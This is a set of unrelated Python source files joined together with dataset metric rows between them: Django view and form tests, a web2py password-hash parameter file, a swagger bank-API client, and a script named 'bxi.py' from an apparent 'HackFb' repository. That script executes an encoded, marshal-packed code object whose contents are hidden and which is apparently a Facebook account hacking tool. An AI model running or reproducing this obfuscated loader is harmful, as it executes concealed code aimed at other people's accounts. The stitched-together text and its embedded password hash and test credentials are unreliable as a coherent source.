serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', safe='')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_edit_logged_in(self):
""" test edit view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_edit_template(self):
""" test edit view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
def test_serviceprovider_edit_get_user_context(self):
""" test edit view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_serviceprovider')
def test_serviceprovider_edit_redirect(self):
""" test edit view """
# get object
serviceprovider_1 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1')
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', safe='/')
# get response
response = self.client.get('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit', follow=True)
# compare
self.assertRedirects(response, destination, status_code=301, target_status_code=200)
def test_serviceprovider_edit_post_redirect(self):
""" test edit view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# create object
serviceprovider_1 = Serviceprovider.objects.create(serviceprovider_name='serviceprovider_edit_post_test_1')
# create post data
data_dict = {
'serviceprovider_name': 'serviceprovider_edit_post_test_2',
}
# get response
response = self.client.post('/serviceprovider/' + str(serviceprovider_1.serviceprovider_id) + '/edit/', data_dict)
# get object
serviceprovider_2 = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_edit_post_test_2')
# create url
destination = urllib.parse.quote('/serviceprovider/' + str(serviceprovider_2.serviceprovider_id) + '/', safe='/')
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_serviceprovider_edit_post_invalid_reload(self):
""" test edit view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get object
serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1').serviceprovider_id
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/' + str(serviceprovider_id) + '/edit/', data_dict)
# compare
self.assertEqual(response.status_code, 200)
def test_serviceprovider_edit_post_invalid_template(self):
""" test edit view """
# login testuser
self.client.login(username='testuser_serviceprovider', password='KxVbBhKZcvh6IcQUGjr0')
# get object
serviceprovider_id = Serviceprovider.objects.get(serviceprovider_name='serviceprovider_1').serviceprovider_id
# create post data
data_dict = {}
# get response
response = self.client.post('/serviceprovider/' + str(serviceprovider_id) + '/edit/', data_dict)
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/generic_form.html')
| 42.451991 | 143 | 0.680808 | 1,778 | 18,127 | 6.724409 | 0.042182 | 0.052693 | 0.062563 | 0.065406 | 0.964369 | 0.945801 | 0.927986 | 0.919957 | 0.902727 | 0.883573 | 0 | 0.014214 | 0.212115 | 18,127 | 426 | 144 | 42.551643 | 0.822924 | 0.121035 | 0 | 0.576923 | 0 | 0 | 0.212086 | 0.115794 | 0 | 0 | 0 | 0 | 0.186813 | 1 | 0.192308 | false | 0.164835 | 0.021978 | 0 | 0.21978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e39b946b395aec70cfe88d0c904cb3533ac0c1ca | 92 | py | Python | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | parameters_8000.py | ProjectTAOC/Web2pyFramework | a5a06614a44cde3690529565d06be191892eb44d | [
"BSD-3-Clause"
] | null | null | null | password="pbkdf2(1000,20,sha512)$8cc1ba2e242c0d1c$a7fdef5f919a98319af1a6eb61509c241350c0b8"
| 46 | 91 | 0.891304 | 7 | 92 | 11.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.472527 | 0.01087 | 92 | 1 | 92 | 92 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0.869565 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e39c9f2b7648b1a2b91328230bd26b9e32fba70b | 11,790 | py | Python | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | bxi.py | Andika-Bandhelk/bxi.py | cb7ae1717c42545fadc9362bb2f311fcc1535715 | [
"Apache-2.0"
] | null | null | null | # Auther : Andika
# GitHub : https://github.com/Andika-Bandhelk/HackFb.git
# YouTube Channel : Belum ada gays
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E73415C7830375C7830305C783030785C7839635C786264577B6F5C786462385C7831325C7866665C7864625C7866615C7831342C5C783137585C7863395C783137595C7862365C7831635C7862377152685C783137695C7839615C7862365C7862396D5C7865625C5C5C7839335C786132585C7861345C783831565C7830665C7864615C786536455C7831327524555C786462595C786563775C786266215C7866355C786230645C275C7863645C786465615C7862315C7830346C495C7866335C786536705C78653647525C7866325C7863645C7838395C783831605C78643034675C5C22266C5C7862315C7831315C7862365C786134295C7862315C786533405C7831325C7866645C7863325C7838332C665C7861395C7862645C7830635C786334325C7861315C7861315C7863645C7838392D5C7839375C7839635C783034315C7863645C7831365C7866365C7862665C7830355C7863625C7865635C7838325C275C7838615C7831313176475C7838397A5B5C7831305C7839395C783037425C786438295C7838395C78393641465C7865665C7863315C7830365C7866394F415C7838345C783134765C7862385C7861365C7839395C786636385C7865372C45695C783931485C783961735C7831365C783131215C7863305C7839635C783933335C7839365C7864345C7862315C5C6B5C275C783937405C7864395C7863615C786437665C7831635C7862325C783865482E295C786362442D7E5C7863365C7862325C783863445C783861745C786365395C7865332D5C783166755C7831305C7862355C7865342B5C786365565C783832705C7861335C7862345C7838312E34552B5C7839355C786239605C7863325C78383124485C7839325A664E5C786633315C7861325C7839395C783930415C783932345C7863655C7863645C786665775C7863355C7831615C7837664F5C7863385C7861394C54222A5C7863645C783865485C7830385C7863392D775F69235C7839372C5C783162235C7865375C7864335C7866395C7865395C7865625C7830665C7865374E5C7831615C7838335C7839365C786331495C7863325C7838325C7864385C7830325C7861315C7862655C7830315C7837665C7838652032265C7866335C7830305C786632495C7862325C7838385C7861395C7862355C7862315C786363425C7863655C786137205C783162725C7865346D5C786133725C7861615C7865395B5C7838615C7861315C7864347C5C7861305C7863375C745C786631395C7830625C7839395C7831345C7864365C783962205C7831315C7861346F6C5C7830335C78633051425C7830325C7838655C7866625C7863365C7830666A5C7861305C7866375C7862335C786237335C7861345F5C7838645C7838342D5C783938675C7839615C786136315C786164465C78313820345C7251355C786532297C5C7863315C786366505C7837666A5C7839385C7838615C7866375C7865625C786434565C7865665C7866365C7866345C7831325C7865645C7862304B5C7864326F4A285C7839655C783961685C7863625C7866365C7864355C7831384C2F355C725C783063685C7862392D7B5C7861305C786337345C7862342B5C786166755C7830345C7831645C7865335C7864616C5C7865395C7861325C7838615C7861305C7863335C7830655C7831345C7861335C7866325A5C783861565C78656372285C7864375C78623557655C786130625C7831625C7838335C786666795C7831385C7830363A2D5C7865345C783932705C786230735C7838325E5C7864316C5C7831335C7861345C786161235C786465525C7866395C7861655C783038357129652E4E5C7838365C7863335C7830355C7839355C7863622274225C7839365C7830655C7863334A6E5C7830302F5C783139355C7864305C7861665C7861635C7862382E425C7861325C7861345C786166395C7838645C7865655C78643025676C6E5C786130575C7862302422675C78623265452A7E5C7861655C7864384E58715C7839355C7863395C7866662B765C7866345C786334505C786235605C783963315C7863655C7861315C7831313F435C78386465414A5C7861305C786636705C7831643E5C7861655C7839395C7839375C7838305C7830652B5C786336635C7863645C5C536C402D5C7862315C7831635C7862654C5C7863395C783062625C7831615C786162254D5C7830385C7862324A624D5C7865645C7839375C7865645C783939735C783961495C7861346A4F5C7837665C7831365B3F3C585C786639345C7863625C7830626961743D5C7839625C786264475C7839665C7861665C7863653F7D3C5C786664707E5C783832705C78643956745C7838655C7861635C7861645C7838325C78383776625C7861643C5C7866345C7866326D787B362F4F5C7861665C7861655C7862655C7863633E5C7862646E6C5C786436765C7862374A5C7838645C7864647A5C7839615C7839355C7864647A5C783934335C7863305C7865383D5B2C485C7830635C7838305C783830445C783131295C7830385C7839635C783137495C786232415C7838315C7830305C78646541335C7862315C7838655C7865613E525C7864345C7861334E5C7865305C5C5C7866355C7861665C7864395C7862305C7830387C3D5C7865635C7866645C783062675C7864395C783032352B5C7866315C783063775C7861345A5C7830305C7862345C7838655C7831375C7830335C7839365C7839335C7865635C7861395C7839325C7831615C783865475C7865335C78643170345C7831656664355C7862385C7861335C7862305C27645C7838625C7830315C786430535C7863305C78313731605C7866335C783831243C2D5C7864365C783833395C7865335C786365525C7861365C7838395C7864395C7837665C786334635C783833385C7866625C7831335C7865385C7830365C7864665C786434582B5C7866385C786266375C786630475C783832565C7863335C7830303C5C7838365C7866355C7862615C786233605C7866357B5C7839325C7863325C7831622C5C7863665C7838645C7865395C7861383E5C7862314D5C7863375C7861395C7831655C783065326F5C7838645C7831655C783938464C555C7838325C7831365C7830345C7838355C7839655C7839655C7861395C7838355C7862665C7866325C7839625C7838335B55295C7831305C7831335C7862615C7863385C7831303E607D5C7866625C786135467C5C7831395C786233423A5C7866335C7861345C7831304B5C7861625C7866665C7862325B5C7831395C786461795C7831345A5C7866645C7864642D5C7861645C745C7862335C7830635C7861665C7831365C7864385C7861662B5C7863644F5C7839345C7864665C7865665C7831385C7864315C7861615C7866355C783139425C7837665C7862303B22615C7839652A5C7865645C7831365C7838365C786439395C786438465C7862385C7839645C7839365C7839365C7839355C7866645C7839645C7861645E5C78663372675C7862367E215C7831625C7862642F5C7864625C783137335C7866646C5C786635515C7863625C7830634F5C7864315C7838305C7863665C783931765C7866365C786137565C7861362C224B415C7863385C7831655C7831315C7864665C786238555C7862615C7864315C7831375C7863305F745C7839655C783036345C7831397E2C5C7864325C783130205C7831625C7865615C786131695C7839387D7B5C786638665C786463513D5C7864353D5C7838645C78616521255C7864395C7862655C7866345C7866335C7864313F5C7866305C786130455C7864365C7861395C7866365C786133255C7861335C7831315C786231765C7861615C7861385C7863622B5C7839335C783130465C7863622E3C7D5C7863645C783030793C5C7865665C275C7864345C7830323B2D5C786534615C7862635C786462405C7831305C7865625C7862335B5C7866345C7830364A5D5C7864355C5C545C786132555C7862325C7864395C725C7863375C7861615B706B6A5C7838635C7831665C5C5C7838333F5C7839355C786532795C783130796D3C5C783835544A5C786432495C7831337A47385C786539205C7865625C7831636A5C7864635C786562565C7864336A5C7838375C7865645C786163385C7839355C7863345C7830325C7865623B5C78663428615C7861325C7839645C7863625C7865365C7866345C78393833212D5C7862335C78643967795C7839302F5C783164505C27215C7839636035205C78613464385C7865375C783934405C7866625C7866665C7839635C783132285C7864325C786438532A3F5C783136345C7831365C7839653B5C783832315C7831653D3F5C7831655C7862395C7831335C786637685C786632635C7861305C7865335C786637555C786535675C783965795C7864305C745C7865337B605C7862345A5C7861645C7839635C725C7838345C745C7866625C7862385C7866365C7861395C786365675C783139495C7838365C7839665C7863662E5C786365465C7865655C7866625C7863645C7863355C786563395C7830335C786138725C7866665C7863355E5C7862635C7861315C7839335C7830665C7861625C783837515C7865375C7866315C7831656A2D5C7839615C7864625A345C7862645C7862305C7861655C7864355C7863355C7864656D5C7839355C7862395C7831615C7861655C783134725C783030685C7861395C7863655C7865655C78663564582E5C7838305C7861395C7861375C7865385C7863385C786235346D64725C7838385C7861375C7864377B2A5C7839325C786465775A5C786239575C7862395C786539755C7838615C786135463E735C7831625C783964465C7863305C7864395C7864625C7838625C7838665C7865385C7863625C7863355C7866353B5C7866345C7865365C7866345C7865635C7866635C7864356C5C7866365C7838625C7861325C7839625C7861385C7864315C7838305C275C7865645C7865655C7864385C786136525C786263783D5C7864343D5C78306347225C783164715C78626552425C7864355C725C7863355C7861395C7839655C786135685C7862335C783137565C7861325C7831615C7862635C786531295C7865385C783032365C786436205C7861375C7866655C7831645C786439785C7864335C786539385C7839384E5C783865475C7838372F5C78646338385C7839655C7831655C7838645C7863365C7865315C7866635C786638285C7831385C7838645C786464385C7838655C786463495C783163715C7831325C7839334C525C7864385C7838377D5C7862395C7863395C783839575C7831665C7830635C7838385C6E5C7830332A5C7838345C7863365C783037265C7865307D5C783161485C7865665C783966575C7862335C7838665C7830625C7839325C7831315C783065772D3F5C725C786132255C7863645C7838384F635C7863666D5C783838425C7864645C7838635C783138345C7862665C7862655C5C415C786635252C5C6E5C7831325C7865325C7839315C7863635C7866667C555C786435665C7830305C7830374A475C7861665E5C7865645C6E5C7862635C7863303C5C7830664C4E645C786331335F5C7838385C7863345C786537445C7862305C783832435C7861397A5C7861336F5C7839655C7865625C7838635E5C7838635C7865375C7864335C7838385C7831635C7863665C783866265C7861315C7830625C7861665C7839335C7863385C7831645C783166465C7864315C7866387072785C7831344C5C7838325C7863335C7862315C745C7831335C7838372B605C7830305C7863395C7866615C78316457735C7863375C275C7866385C7861395C786439635C7831625C786566265C7830305C7862345C7865615C7862385C7838305C7861625C7862335C7838304F686C5C786533325C745C7863305669505C7839645C786664402A5C7838305C7865625C7838325C786436635C7866395C7861385C78643865525C786530435C7861375C7830355C78303865665C7838305C7862305C7863645C72505C783962304E203B367E283B5C786130325C7830325C7863396F5C7863615C786230335C7863325C783766405C7831365C7864365E755C786635755C7865307C605C786531347E5C7861655C6E5C7862625C786237765C7838615C5C5C7864645C7839312D285C7830665C7866355C783164786B67495C786436315D5C7830305C7863365C7865385C786261515C7865395C7861625C7838357E37415C7863633C5C745C786665505C7830635C786238305C7861625C7839336F5C7838645C7830345C7839305C7864642E5C786663705C783835525C7838345C783766235C7864635C7863395C783937395C7830365C725C786565355C7865305C783035256B5C7838315C7830313B5C783066785C7839305C6E4F3951365C7865663D755C783137775C7864345C78616450585C7864635C783931642D5C7831355C783139405C7863306C235C7839345C7861395C7830305C7866665E355C7839665C7865612C5C7862315C786266575C7861665C7866345C7865344A665C7838355C7861635C786637375C7862386D5C7830325C7864665C786236246A5C7838632D5C74555C275C7839625F5C7862335C7861666B375C786263715F5C7831655C7838665C7864335C7865365C7866635C7838325C7861655C7862365C7861375C5C545C7866335C783866525C786233565C7839365C7838645C7839395C7862665C783138364B5C7861335C7837665C7830625C7866615C7864665C786466745C7862337D5C7862623F5C786135475C7838305C786232575C783165744B6958355C786163265C7864615C7830655C7830625C7865625C7839355C7862625C786331445C7863315C7861375C7839665C7838615C7830355C7862655C7861645C7863355C7864625C7861395C7838375C7865645C7839345C7831355C7866305C783036355C7838625C7830325C7831342D5C745C783963785C783939623D6B325C7862315C7839335C7865325C7864365C7866395C786139235C7862325D5C7838665C7863655C786265515C7839325C7864615C7864315C7862365C78646323535C786637375C7838325C7865336C735C7831665C7861325C7830325C7861645C786634715C7866645C7861665C7838625C78613067405C7838367C5F5C7839645C7866647D5C78316636385C7831665C7831305C7830334E487E5C7862355C786366555C7838375C7839375C7866665C7830325C7862665C7838397A42285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 2,358 | 11,666 | 0.996777 | 21 | 11,790 | 559.619048 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.854498 | 0.001442 | 11,790 | 5 | 11,666 | 2,358 | 0.143719 | 0.008736 | 0 | 0 | 0 | 0 | 0.996234 | 0.996234 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
5837a2e73b86c57e8aa4899f6898c31e59228950 | 6,926 | py | Python | tests/test_forms.py | moshthepitt/django-approvals | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | 4 | 2020-05-30T16:15:22.000Z | 2021-06-15T20:45:01.000Z | tests/test_forms.py | moshthepitt/django-model-reviews | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | 8 | 2020-05-20T19:00:13.000Z | 2020-10-04T09:04:05.000Z | tests/test_forms.py | moshthepitt/django-model-reviews | ebf3fd42e88ac255191d0764387fc213a2472ee4 | [
"MIT"
] | null | null | null | """Test forms."""
from datetime import datetime
from unittest.mock import patch
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.test import RequestFactory, TestCase
import pytz
from model_mommy import mommy
from model_reviews.forms import PerformReview
from model_reviews.models import ModelReview
class TestForms(TestCase):
"""Test class for forms."""
def setUp(self):
"""Set up test class."""
self.factory = RequestFactory()
@patch("django.utils.timezone.now")
def test_successful_performreview(self, mock):
"""Test successful PerformReview submission."""
mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
mock.return_value = mocked_now
user1 = mommy.make("auth.User", username="joe")
user2 = mommy.make("auth.User", username="jane")
test_model = mommy.make("test_app.TestModel", name="Test")
obj_type = ContentType.objects.get_for_model(test_model)
review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
review.user = user1
review.save()
reviewer = mommy.make("model_reviews.Reviewer", user=user2, review=review)
request = self.factory.get("/")
request.session = {}
request.user = user2
data = {
"review": review.pk,
"reviewer": reviewer.pk,
"review_status": ModelReview.APPROVED,
}
form = PerformReview(data=data)
self.assertTrue(form.is_valid())
form.save()
review.refresh_from_db()
reviewer.refresh_from_db()
test_model.refresh_from_db()
self.assertEqual(ModelReview.APPROVED, review.review_status)
self.assertEqual(ModelReview.APPROVED, test_model.review_status)
self.assertEqual(mocked_now, review.review_date)
self.assertEqual(mocked_now, test_model.review_date)
self.assertEqual(True, reviewer.reviewed)
self.assertEqual(mocked_now, reviewer.review_date)
self.assertEqual(ModelReview.APPROVED, reviewer.review_status)
@patch("django.utils.timezone.now")
def test_successful_performreview_multiple_reviewers(self, mock):
"""Test successful PerformReview submission with multiple reviewers."""
mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
mock.return_value = mocked_now
user1 = mommy.make("auth.User", username="joe")
user2 = mommy.make("auth.User", username="jane")
user3 = mommy.make("auth.User", username="jenny")
test_model = mommy.make("test_app.TestModel", name="Test")
obj_type = ContentType.objects.get_for_model(test_model)
review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
review.user = user1
review.save()
mommy.make("model_reviews.Reviewer", user=user2, review=review)
reviewer = mommy.make("model_reviews.Reviewer", user=user3, review=review)
request = self.factory.get("/")
request.session = {}
request.user = user3
data = {
"review": review.pk,
"reviewer": reviewer.pk,
"review_status": ModelReview.APPROVED,
}
form = PerformReview(data=data)
self.assertTrue(form.is_valid())
form.save()
review.refresh_from_db()
reviewer.refresh_from_db()
test_model.refresh_from_db()
self.assertEqual(ModelReview.APPROVED, review.review_status)
self.assertEqual(ModelReview.APPROVED, test_model.review_status)
self.assertEqual(mocked_now, review.review_date)
self.assertEqual(mocked_now, test_model.review_date)
self.assertEqual(True, reviewer.reviewed)
self.assertEqual(mocked_now, reviewer.review_date)
self.assertEqual(ModelReview.APPROVED, reviewer.review_status)
# pylint: disable=too-many-locals
@patch("tests.test_app.models.get_next_reviewers")
@patch("django.utils.timezone.now")
def test_successful_performreview_multiple_reviewers_levels(self, mock, next_mock):
"""Test successful PerformReview with multiple reviewers of different levels."""
mocked_now = datetime(2010, 1, 1, tzinfo=pytz.timezone(settings.TIME_ZONE))
mock.return_value = mocked_now
user1 = mommy.make("auth.User", username="joe")
user2 = mommy.make("auth.User", username="jane")
user3 = mommy.make("auth.User", username="jenny")
test_model = mommy.make("test_app.TestModel", name="Test")
obj_type = ContentType.objects.get_for_model(test_model)
review = ModelReview.objects.get(content_type=obj_type, object_id=test_model.id)
review.user = user1
review.save()
reviewer = mommy.make(
"model_reviews.Reviewer", user=user2, review=review, level=1
)
reviewer2 = mommy.make(
"model_reviews.Reviewer", user=user3, review=review, level=2
)
request = self.factory.get("/")
request.session = {}
request.user = user2
data = {
"review": review.pk,
"reviewer": reviewer.pk,
"review_status": ModelReview.APPROVED,
}
form = PerformReview(data=data)
self.assertTrue(form.is_valid())
form.save()
review.refresh_from_db()
reviewer.refresh_from_db()
test_model.refresh_from_db()
next_mock.assert_called_once_with(review_obj=review)
self.assertEqual(ModelReview.PENDING, review.review_status)
self.assertEqual(ModelReview.PENDING, test_model.review_status)
self.assertEqual(None, review.review_date)
self.assertEqual(None, test_model.review_date)
self.assertEqual(True, reviewer.reviewed)
self.assertEqual(mocked_now, reviewer.review_date)
self.assertEqual(ModelReview.APPROVED, reviewer.review_status)
request = self.factory.get("/")
request.session = {}
request.user = user3
data2 = {
"review": review.pk,
"reviewer": reviewer2.pk,
"review_status": ModelReview.APPROVED,
}
form = PerformReview(data=data2)
self.assertTrue(form.is_valid())
form.save()
review.refresh_from_db()
reviewer2.refresh_from_db()
test_model.refresh_from_db()
self.assertEqual(ModelReview.APPROVED, review.review_status)
self.assertEqual(ModelReview.APPROVED, test_model.review_status)
self.assertEqual(mocked_now, review.review_date)
self.assertEqual(mocked_now, test_model.review_date)
self.assertEqual(True, reviewer2.reviewed)
self.assertEqual(mocked_now, reviewer2.review_date)
self.assertEqual(ModelReview.APPROVED, reviewer2.review_status)
| 35.336735 | 88 | 0.66633 | 785 | 6,926 | 5.690446 | 0.135032 | 0.094023 | 0.034923 | 0.067159 | 0.829416 | 0.815312 | 0.767405 | 0.765615 | 0.753526 | 0.697336 | 0 | 0.008934 | 0.224228 | 6,926 | 195 | 89 | 35.517949 | 0.822446 | 0.038695 | 0 | 0.711268 | 0 | 0 | 0.076354 | 0.033952 | 0 | 0 | 0 | 0 | 0.232394 | 1 | 0.028169 | false | 0 | 0.06338 | 0 | 0.098592 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5845f21b5a4589965f2606b32172d2d391b0c689 | 9,331 | py | Python | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | swagger_client/api/provider_api.py | chbndrhnns/ahoi-client | 8bd25f541c05af17c82904fa250272514b7971f2 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
[AHOI cookbook](/ahoi/docs/cookbook/index.html) [Data Privacy](/sandboxmanager/#/privacy) [Terms of Service](/sandboxmanager/#/terms) [Imprint](https://sparkassen-hub.com/impressum/) © 2016‐2017 Starfinanz - Ein Unternehmen der Finanz Informatik # noqa: E501
OpenAPI spec version: 2.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class ProviderApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_provider(self, provider_id, **kwargs): # noqa: E501
"""Get provider # noqa: E501
Retrieve a single provider identified by **providerId**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_provider(provider_id, async=True)
>>> result = thread.get()
:param async bool
:param int provider_id: The **providerId** to retrieve (required)
:return: Provider
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_provider_with_http_info(provider_id, **kwargs) # noqa: E501
else:
(data) = self.get_provider_with_http_info(provider_id, **kwargs) # noqa: E501
return data
def get_provider_with_http_info(self, provider_id, **kwargs): # noqa: E501
"""Get provider # noqa: E501
Retrieve a single provider identified by **providerId**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_provider_with_http_info(provider_id, async=True)
>>> result = thread.get()
:param async bool
:param int provider_id: The **providerId** to retrieve (required)
:return: Provider
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['provider_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_provider" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'provider_id' is set
if ('provider_id' not in params or
params['provider_id'] is None):
raise ValueError("Missing the required parameter `provider_id` when calling `get_provider`") # noqa: E501
collection_formats = {}
path_params = {}
if 'provider_id' in params:
path_params['providerId'] = params['provider_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/providers/{providerId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Provider', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_providers(self, **kwargs): # noqa: E501
"""List bank providers # noqa: E501
Retrieve a list of bank providers. A provider-**id** is necessary to create an _access_. To retrieve the necessary access fields, you need to query the specific `provider/{providerId}`. For performance reasons they are kept separate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_providers(async=True)
>>> result = thread.get()
:param async bool
:param str bank_code: Optional — if length = 8, the response will also contain data describing the fields required for account setup
:param bool supported: Optional — response should only contain providers supported for account setup via this API
:param str query: Optional — search parameters for BankCode, BIC, Location, Name. Will be ignored if the bankCode query parameter is set.
:return: list[Provider]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_providers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_providers_with_http_info(**kwargs) # noqa: E501
return data
def get_providers_with_http_info(self, **kwargs): # noqa: E501
"""List bank providers # noqa: E501
